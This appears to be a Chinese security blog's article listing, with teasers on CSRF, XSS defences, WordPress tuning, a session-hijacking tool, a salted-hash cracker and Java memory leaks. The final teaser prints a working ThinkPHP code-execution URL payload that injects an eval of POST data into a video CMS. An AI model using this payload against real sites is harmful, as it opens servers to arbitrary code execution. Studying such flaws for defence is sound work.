今年2月,美国总统奥巴马公布了一网络安全国家行动计划(简称CNAP),旨在通过一系列长期与短期举措改善美国的网络安全态势。此项计划的一大主要特点在于无党派国家网络安全强化委员会的成立,其将由来自企业、...
test
test
WEB安全
浅谈CSRF攻击方式
一.CSRF是什么? CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CS...
硬件安全
针对XSS漏洞的前端防火墙(2):可疑模块拦截
上一篇介绍的系统,虽然能防御简单的内联 XSS 代码,但想绕过还是很容易的。 由于是在前端防护,策略配置都能在源代码里找到,因此很快就能试出破解方案。并且攻击者可以屏蔽日志接口,在自己电脑上永不发出报...
WordPress技巧
调整数据库表结构,搞定 WordPress 数据库查询缓慢问题
同事的基于 WordPress 搭建的网站,因为数据越来越多,变得慢,我从 PHP slow log 里面看出是 WordPress 有些查询总是很慢,即使已经安装了页面缓存插件,但是由于页面众多,命...
一款国外开源会话劫持(XSS)平台——CookieCatcher
CookieCatcher是一款开源攻击测试工具,可以通过持久性XSS (Cross Site Scripting) 漏洞进行会话劫持。本工具仅用于纯粹的教学之用,禁止用于非授权的...
系统文档
Signing and licensing of Office365 A1 Plus and ADT4T and Microsoft EES/OVS ES
首先,这篇文章非常长,过程也极其复杂,需要分好多步骤说完,文章的最后会详解微软Office365教育版历史。 之前有提到office365的教育版分开普通版(A1)和增强版(A1 Plus),二者最主...
神兵利刃
破解加盐(Salted)SHA256 Hash工具—SHA256 Salted Hash Kracker
SHA256 Salted Hash Kracker是一个免费工具,用于破解和恢复加盐的(Salted)SHA256 Hash(小编:我为自己带盐) 这款工具支持所有的windows平台,无论32位或...
如何用Java编写一段代码引发内存泄露
文本来自StackOverflow问答网站的一个热门讨论:如何用Java编写一段会发生内存泄露的代码。 Q:刚才我参加了面试,面试官问我如何写出会发生内存泄露的Java代码。这个问题我一点思路...
Seay信息安全博客
飞飞影视系统2.0.120220(Beta4)版thinkphp任意代码执行
显示不全请点击全屏阅读 第一个方法 直接执行 http://www.2cto.com/index.php?s=vod-search-area-${@print(eval($_POST))} .html...
